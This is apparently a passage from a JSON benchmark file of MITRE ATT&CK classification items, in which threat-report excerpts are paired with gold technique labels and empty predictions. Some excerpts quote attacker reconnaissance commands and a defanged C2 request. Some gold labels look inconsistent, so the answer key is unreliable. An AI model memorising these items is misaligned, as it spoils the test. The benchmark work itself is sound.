MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The tokens for each platform are hardcoded within the sample:November 2016 to January 2017: \"Evil New Year\" CampaignIn the early part of 2017, Group123 started the \"Evil New Year\" campaign\n\t - T1134: Access Token Manipulation\n- Text: The actor has used this method on its 2019 campaign as well. This UAC bypass starts by executing wusa.exe using ShellExecuteExw and gets its access token using NtOpenProcessToken. Then the access token of wusa.exe is duplicated using NtDuplicatetoken. The DesiredAccess parameter of this function specifies the requested access right for the new token. In this case the actor passed TOKEN_ALL_ACCESS as DesiredAccess value which indicates that the new token has the combination of all access rights of this current token. The duplicated token is then passed to ImpersonateLoggedOnUser and then a cmd instance is spawned using CreateProcessWithLogomW. At the end the duplicated token is assigned to the created thread using NtSetINformationThread to make it elevated\n\t - T1134.002: Access Token Manipulation - Create Process with Token\n- Text: In order to encrypt network shares, BitPaymer will attempt to enumerate the sessions for each user logged onto the infected host and create a new process, using the token of each user. These new processes will first spawn a net.exe processing with the view argument to gather a list of network accessible hosts. For each host, BitPaymer spawns another net.exe process with command net view <host> using the newly discovered host as a parameter. This will return a list of network shares available to the impersonated user on the host. Once a list of all available shares has been gathered, BitPaymer attempts to mount them to be encrypted\n\t - T1135: Network Share Discovery\n\t - T1134.001: Access Token Manipulation - Token Impersonation/Theft\n", "input": "\ncontains a feature to manipulate process privileges and tokens.", "gold": "- T1134: Access Token Manipulation", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cadelspy has the ability to record audio from the compromised host.\n\t - T1123: Audio Capture\n- Text: HotCroissant has the ability to do real time screen viewing on an infected host.\n\t - T1113: Screen Capture\n- Text: InvisiMole can remotely activate the victim\u2019s webcam to capture content.\n\t - T1125: Video Capture\n", "input": "\nTakes screenshots when recording VoiceIP app audio", "gold": "- T1113: Screen Capture\n- T1123: Audio Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The script will first attempt to communicate with the C2 server using HTTPS (HTTP if unsuccessful), which involves GET requests using the session ID within the request\u2019s cookie in the PHPSESSID field, as seen in the example GET request: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246Host: www.rdppath[.]comCookie: PHPSESSID=Connection: Keep-Alive If the payload is unable to reach the C2 via HTTPS/HTTP, the payload yet again falls back to DNS tunneling\n\t - T1071: Application Layer Protocol\n\t - T1041: Exfiltration Over C2 Channel\n\t - T1008: Fallback Channels\n- Text: WindTail has the ability to automatically exfiltrate files using the macOS built-in utility /usr/bin/curl.\n\t - T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol\n- Text: Shamoon has used HTTP for C2.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", "input": "\nuses HTTP for command and control.", "gold": "- T1071: Application Layer Protocol", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cadelspy compresses all of the stolen data into a .cab file and uploads it to the attacker\u2019s C&C servers\n\t - T1560: Archive Collected Data\n- Text: The implant has the capability of gathering data from the victim\u2019s system. The following information will be gathered and sent to the command and control server\n\t - T1560.002: Archive Collected Data - Archive via Library\n- Text: The results are Gzipped and saved under random file in the temp folder. Following successful collection of information, the data is send back to the C2 and the file is deleted\n\t - T1074.001: Data Staged - Local Data Staging\n\t - T1560.001: Archive Collected Data - Archive via Utility\n", "input": "\ncan compress data before sending it.", "gold": "- T1560: Archive Collected Data", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The C2 channel uses HTTP POST requests.\n\t - T1071: Application Layer Protocol\n- Text: opens a backdoor on TCP ports 6868 and 7777.\n\t - T1571: Non-Standard Port\n- Text: Amadey has used HTTP for C2 communications.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", "input": "\nhas used TCP port 8080 for C2.", "gold": "- T1043: Commonly Used Port", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Unlike a previously reported variant, this version of BADNEWS no longer looks at USB drives for interesting files\n\t - T1083: File and Directory Discovery\n- Text: For all non-removable drives on a victim, executes automated collection of certain files for later exfiltration.\n\t - T1119: Automated Collection\n- Text: Umbreon provides access using both standard facilities like SSH and additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", "input": "\nThe full contents of the batch script are given in Appendix C \u2013 a.bat", "gold": "- T1059: Command and Scripting Interpreter\n- T1064: Scripting", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT32 used NTFS alternate data streams to hide their payloads.\n\t - T1564.004: Hide Artifacts - NTFS File Attributes\n- Text: When executed, the final macro code as interpreted by CMD decodes into a classic PowerShell download cradle that fetches the initial QakBot payload. There is one last bit of obfuscation here as the script does contain two more encoded strings. One is the URL as seen above in Figure 8, and another is the full path to which the payload will initially be written: \u201cC:\\Users\\Public\\tmpdir\\file\u201d.\u00a0\n\t - T1059: Command and Scripting Interpreter\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: When receiving HTTP commands, the WellMess server is setup to receive POST requests that contain RC6 encrypted cookies. The server decrypts the cookies using a hardcoded RC6 key and expects the decrypted data to contain no more than four tags\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", "input": "\nIf the victim is using PowerShell 3.0 or later, writes its decoded payload to an alternate data stream (ADS) named kernel32.dll that is saved in %PROGRAMDATA%\\Windows\\.", "gold": "- T1564.004: Hide Artifacts - NTFS File Attributes", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Misdat has uploaded files and data to its C2 servers.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: BoomBox has the ability to download next stage malware components to a compromised system.\n\t - T1105: Ingress Tool Transfer\n- Text: Rover automatically searches for files on local drives based on a predefined list of file extensions and sends them to the command and control server every 60 minutes. Rover also automatically sends keylogger files and screenshots to the C2 server on a regular timeframe.\n\t - T1020: Automated Exfiltration\n", "input": "\nAdversaries can direct to upload files to the C2 Server.", "gold": "- T1041: Exfiltration Over C2 Channel", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can use HTTP or HTTPS for command and control to hard-coded C2 servers.\n\t - T1071: Application Layer Protocol\n- Text: binds and listens on port 1058.\n\t - T1571: Non-Standard Port\n- Text: QakBot has the ability to use HTTP and HTTPS in communication with C2 servers.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", "input": "\nuses commonly used ports (like HTTPS/443) for command and control.", "gold": "- T1043: Commonly Used Port", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: WellMess can identify domain group membership for the current user.\n\t - T1069.002: Permission Groups Discovery - Domain Groups\n- Text: The data dump included the 0000000000.bat file, which when executed on an infected system would run the following commands to gather information to be sent back to the C2 server: whoami hostname ipconfig /all net user /domain net group /domain net group \u201cdomain admins\u201d /domain net group \u201cExchange Trusted Subsystem\u201d /domain net accounts /domain net user net localgroup administrators netstat -an tasklist systeminfo reg query \u201cHKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\u201d schtasks /query /FO List /TN \u201cGoogleUpdatesTaskMachineUI\u201d /V | findstr /b /n /c:\u201dRepeat: Every:\u201d WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List This batch script is also interesting as it uses echo commands to include headers before each of the command results\n\t - T1069: Permission Groups Discovery\n\t - T1087: Account Discovery\n- Text: PUNCHBUGGY can gather user names.\n\t - T1087.001: Account Discovery - Local Account\n", "input": "\ncollects lists of local accounts with administrative access, local group user accounts, and domain local groups with the commands net localgroup administrators, net localgroup users, and net localgroup /domain.", "gold": "- T1069: Permission Groups Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The companies believe that the actors acquired legitimate credentials prior to the cyber-attack to facilitate remote access\n\t - T1078: Valid Accounts\n\t - T1219: Remote Access Software\n- Text: Hydraq creates new services to establish persistence.\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: Moses Staff has dropped a web shell onto a compromised system.\n\t - T1505.003: Server Software Component - Web Shell\n", "input": "\nFigure 2: AuditCred/ROptimizer Service If successfully installed, this particular backdoor poses quite a threat to its target", "gold": "- T1543: Create or Modify System Process\n- T1543.003: Create or Modify System Process - Windows Service", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: HyperBro has used a legitimate application to sideload a DLL to decrypt, decompress, and run a payload.\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n- Text: The plugin is a Mimikatz version compiled in the Second_Release_PowerShell configuration. This version can be loaded into the address space of a PowerShell process via reflective DLL loading as implemented in the Exfiltration module of PowerSploit\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n- Text: It communicates encoded system information to a single hard coded command and control (C2) server, using the system\u2019s default User-Agent string. BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it. That malicious dll then loads encrypted shellcode from the binary, which is decrypted and runs the final BUGJUICE payload. BUGJUICE defaults to TCP using a custom binary protocol to communicate with the C2, but can also use HTTP and HTTPs if directed by the C2. SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests. Messages are encrypted using AES with a static key. Persistence is maintained through a Run registry key. The versions used by APT10 (1.3.4.0, 2.0.0.0, and 2.0.0.1) are not available via the public GitHub page, indicating that APT10 has further customized the open source version. The 2.0 versions require a dropper to decipher and launch the AES encrypted QUASARRAT payload. QUASARRAT is a fully functional .NET backdoor that has been used by multiple cyber espionage groups in the past\n\t - T1574.001: Hijack Execution Flow - DLL Search Order Hijacking\n", "input": "\nlaunched an HTTP malware variant and a Port 22 malware variant using a legitimate executable that loaded the malicious DLL.", "gold": "- T1574.002: Hijack Execution Flow - DLL Side-Loading", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: actors leverage legitimate credentials to log into external remote services.\n\t - T1078: Valid Accounts\n\t - T1133: External Remote Services\n- Text: Mimikatz's `CRYPTO` module can create and export various types of authentication certificates.\n\t - T1649: Steal or Forge Authentication Certificates\n- Text: During Night Dragon, threat actors used compromised VPN accounts to gain access to victim systems.\n\t - T1078: Valid Accounts\n\t - T1133: External Remote Services\n", "input": "\nregained access after eviction via the corporate VPN solution with a stolen VPN certificate, which they had extracted from a compromised host.", "gold": "- T1133: External Remote Services", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Manage the use of privileged accounts. Configure access controls, including file, directory, and network share permissions with the principle of least privilege in mind. If a user only needs to read specific files, they should not have write access to those files, directories, or shares. Secure use of WMI by authorizing WMI users and setting permissions. Disable or limit remote WMI and file sharing. Block remote execution through PSEXEC. Segregate networks and functions. Harden network devices and secure access to infrastructure devices. Perform out-of-band network management. Disable SMBv1 and block all versions of SMB at the network boundary by blocking TCP port 445 with related protocols on UDP ports 137-138 and TCP port 139; this applies to all boundary devices\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n- Text: Empire can find shared drives on the local system.\n\t - T1135: Network Share Discovery\n- Text: FIN7 gathers information on network shares.\n\t - T1039: Data from Network Shared Drive\n", "input": "\nactors mapped network drives using net use.", "gold": "- T1021.002: Remote Services - SMB/Windows Admin Shares", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Threat Group-3390 has used WinRM to enable remote execution.\n\t - T1021.006: Remote Services - Windows Remote Management\n- Text: Winexe installs a service on the remote system, executes the command, then uninstalls the service.\n\t - T1569.002: System Services - Service Execution\n- Text: OilRig has used macros to deliver malware such as QUADAGENT and OopsIE. OilRig has used batch scripts.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", "input": "\nhas the ability to remotely execute commands.", "gold": "- T1059: Command and Scripting Interpreter", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FIN6 has used the Stealer One credential stealer to target web browsers.\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: FireEye assesses APT33 may be behind a series of intrusions and attempted intrusions within the engineering industry. FireEye's Managed Defense has responded to and contained numerous intrusions that we assess are related. The actor is leveraging publicly available tools in early phases of the intrusion; however, we have observed them transition to custom implants in later stage activity in an attempt to circumvent our detection\n\t - T1555: Credentials from Password Stores\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n\t - T1003.005: OS Credential Dumping - Cached Domain Credentials\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n\t - T1552.006: Unsecured Credentials - Group Policy Preferences\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1588.002: Obtain Capabilities - Tool\n- Text: PowerShell scripts that perform system reconnaissance and credential theft from Windows Credential Manager and then send this information back to Waterbug C&Cs\n\t - T1555.004: Credentials from Password Stores - Windows Credential Manager\n", "input": "\nused the public tool BrowserPasswordDump10 to dump passwords saved in browsers on victims.", "gold": "- T1003: OS Credential Dumping", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: UBoatRAT checks for virtualization software such as VMWare, VirtualBox, or QEmu on the compromised machine.\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n- Text: Agent Tesla has he ability to perform anti-sandboxing and anti-virtualization checks.\n\t - T1497: Virtualization/Sandbox Evasion\n- Text: jRAT uses WMIC to identify anti-virus products installed on the victim\u2019s machine and to obtain firewall details.\n\t - T1047: Windows Management Instrumentation\n", "input": "\nFirst, we had not seen the CPU fan check used before, and upon testing the WMI query in a VMware Windows 7 virtual machine we saw no result, as seen in Figure 1 Figure 1 WMI query for the Win32_Fan class on a VM returning no statistics However, when we ran the same query in a physical system running Windows 7, we saw the contents of the Win32_Fan class, as seen in Figure 2", "gold": "- T1047: Windows Management Instrumentation\n- T1497: Virtualization/Sandbox Evasion", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Password from successful login to the infected server: Whenever someone logs in a system infected with Linux/Ebury, the\u00a0sshd\u00a0daemon will save the password and send it to the exfiltration server. Password on successful login from the infected server: When someone uses the\u00a0ssh\u00a0client on an infected server, Linux/Ebury will intercept the password and sent it to its exfiltration server. Private key passphrase: When the\u00a0ssh\u00a0client on an infected server prompts the user for an private key passphrase, the passphrase will be sent to the remote exfiltration server. Unencrypted private key: When a private key is used to authenticate to a remote server, the unencrypted version is intercepted by the malware. Unlike passwords, it will not send the key to the exfiltration server. Instead, it will store it memory and wait for the operators to fetch the key with the\u00a0Xcat\u00a0command. Private keys added to the OpenSSH agent with\u00a0ssh-add: The keys added to an OpenSSH agent are also intercepted by the malware. Both the unencrypted key itself and the passphrase typed by the user will be logged\n\t - T1552.004: Unsecured Credentials - Private Keys\n- Text: APT29 has abused misconfigured AD CS certificate templates to impersonate admin users and create additional authentication certificates.\n\t - T1649: Steal or Forge Authentication Certificates\n- Text: APT29 has stolen user's saved passwords from Chrome.\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n", "input": "\nCRYPTO::Extract module can extract keys by interacting with Windows cryptographic application programming interface (API) functions.", "gold": "- T1552.004: Unsecured Credentials - Private Keys", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This tool was originally intended to aid defenders in simulating obfuscated PowerShell commands to better their defenses\n\t - T1027: Obfuscated Files or Information\n- Text: CreepySnail can use Base64 to encode its C2 traffic.\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: Also, the PlugX that Mustang Panda APT uses has some extra features, including spreading through USB, gathering information, and stealing documents in air-gaped networks via USB\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n\t - T1074.001: Data Staged - Local Data Staging\n", "input": "\ncontains a collection of ScriptModification modules that compress and encode scripts and payloads.", "gold": "- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Remcos can access a system\u2019s webcam and take pictures.\n\t - T1125: Video Capture\n- Text: The payload has a function it calls early on that tests to see which DNS query types are able to successfully reach the C2 server.\u00a0 It iterates through a list of types and the first DNS type to receive a response from the C2 server will be used for all communications between the payload and the C2 server, which are in the following order (editor\u2019s note: AC is not a\u00a0 DNS record type but is a mode where the trojan will perform a request for an A record requiring ac as a subdomain): A AAAA AC \u2013 (see note above) CNAME MX TXT SRV SOA The payload uses the built-in Windows nslookup application with specific parameters and specially crafted subdomains to communicate with the C2\n\t - T1123: Audio Capture\n\t - T1071: Application Layer Protocol\n\t - T1041: Exfiltration Over C2 Channel\n\t - T1008: Fallback Channels\n- Text: Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. xxmm (also known as Minzen) \u2014 This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - Screen Capture Tool\u2014 This tool can capture the desktop of a victim's system (see Figure 5). Figure 5. Screen Capture Tool usage. Source: Secureworks) - RarStar \u2014 This custom tool uploads RAR archives to a specified URL as POST data (see Figure 6). RarStar encodes the POST data using Base64 and a custom XOR algorithm. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. WinRAR \u2014 This tool extracts tools for lateral movement and compresses data for exfiltration. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity. Install a background monitor tool (e.g\n\t - T1113: Screen Capture\n", "input": "\ncan perform webcam viewing.", "gold": "- T1125: Video Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: An uptick in activity from GRIM SPIDER, a subgroup of the criminal enterprise CrowdStrike Intelligence tracks as WIZARD SPIDER, has led to the identification of consistent actions employed to carry out their attacks. As part of their initial compromise \u2014 usually as a download from a spam email \u2014 they gain a foothold with their modular TrickBot malware, which was developed and is principally operated by WIZARD SPIDER. Once TrickBot is executed, new enumeration modules are downloaded onto the compromised machine to facilitate WIZARD SPIDER\u2019s spread in search of credentials with the aim of gaining access to the domain controller. The criminal actors use RDP to perform lateral movement and explore the victim environment, with an end result of gaining access to the domain controller. Once this access has been achieved, GRIM SPIDER is able to deploy the Ryuk ransomware to the entire network\n\t - T1071.001: Application Layer Protocol - Web Protocols\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n\t - T1204.002: User Execution - Malicious File\n\t - T1041: Exfiltration Over C2 Channel\n- Text: Octopus has uploaded stolen files and data from a victim's machine over its C2 channel.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: Mailman: communicates with a C&C server to receive commands and writes them to a file. It also sends the file with output from commands to the C&C server.\n\t - T1071: Application Layer Protocol\n", "input": "\nXAgent uses HTTP requests to communicate with its C2 servers, which allows the threat actor to interact with the compromised system", "gold": "- T1071: Application Layer Protocol", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Emotet has been observed to hook network APIs to monitor network traffic.\n\t - T1040: Network Sniffing\n- Text: From one of the hosts, we discovered that the actor executed a credential harvesting tool named Responder and moved laterally using Windows commands. Lazarus overcame network segmentation, exfiltrating data from a completely isolated network segment cut off from the internet by compromising a router virtual machine, as we explain below under \u201cOvercoming network segmentation\n\t - T1557.001: Adversary-in-the-Middle - LLMNR/NBT-NS Poisoning and SMB Relay\n", "input": "\nappears to have functionality to sniff for credentials passed over HTTP, SMTP, and SMB.", "gold": "- T1040: Network Sniffing", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Gazer can establish persistence by creating a .lnk file in the Start menu or by modifying existing .lnk files to execute the malware through cmd.exe.\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- Text: The AppleSeed payload has an export function named \u201cDllRegisterServer\u201d which will be called when the DLL is executed using RegSvr32.exe. DllRegisterServer has a function that is responsible for performing the DLL initialization and setup that includes the following steps\n\t - T1059.007: Command and Scripting Interpreter - JavaScript\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: Gazer can establish persistence by creating a .lnk file in the Start menu.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n", "input": "\nhas used JavaScript to create a shortcut file in the Startup folder that points to its main backdoor.", "gold": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world 